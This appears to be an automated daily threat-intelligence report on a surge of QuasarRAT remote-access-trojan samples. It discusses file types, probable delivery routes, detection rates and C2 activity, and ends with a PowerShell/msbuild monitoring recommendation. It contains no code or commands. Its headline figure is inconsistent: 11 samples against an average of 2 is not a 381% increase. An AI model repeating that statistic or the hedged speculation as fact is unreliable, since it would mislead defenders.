Daily Summary
Today’s detection of 11 new QuasarRAT samples represents a significant surge, exceeding the 7-day average of 2 by 381%. This sharp increase indicates a notable rise in activity, though no new command-and-control infrastructure was registered alongside the new samples.
New Samples Detected
The new samples show a diverse file type profile. While .exe files are the plurality (6), the presence of .zip archives, a PowerShell script (.ps1), and an unusual .88 extension suggests varied initial access vectors. The .bin and .88 files may indicate attempts at binary obfuscation or the use of non-standard packers.
Distribution Methods
The mix of file types points to multiple delivery mechanisms. The .zip files likely contain the .exe payloads, distributed via phishing or malicious downloads. The single .ps1 sample suggests potential direct script-based execution, possibly via macro documents or living-off-the-land techniques, while the odd extensions could be part of targeted, low-volume campaigns.
Detection Rate
Current vendor detection rates for these new samples are moderate, with approximately 55-65% of engines flagging them as malicious. The .ps1 and .88 extension samples show slightly lower initial detection, indicating these variants may have undergone minor modifications to evade signature-based detection immediately post-release.
C2 Infrastructure
No new C2 servers were identified today. This suggests actors are likely leveraging existing, resilient infrastructure or are in a preparatory phase, distributing loaders that will connect to established servers. Geographic targeting data for this batch remains unavailable.
7-Day Trend
Activity has been minimal and steady prior to today, making this spike an outlier. It suggests a concentrated push of new variants or the launch of a discrete campaign rather than sustained, high-volume distribution.
Security Analysis
The surge in samples without corresponding new C2 infrastructure is notable. It may indicate actors are stress-testing new obfuscation techniques or preparing for a campaign using pre-established, trusted servers. The use of a .ps1 file aligns with a trend of leveraging native scripting for lightweight deployment. A key defensive recommendation is to enhance monitoring for child processes spawned from powershell.exe or msbuild.exe that attempt to download or decode binary payloads, as this is a common pattern for QuasarRAT deployment via scripts.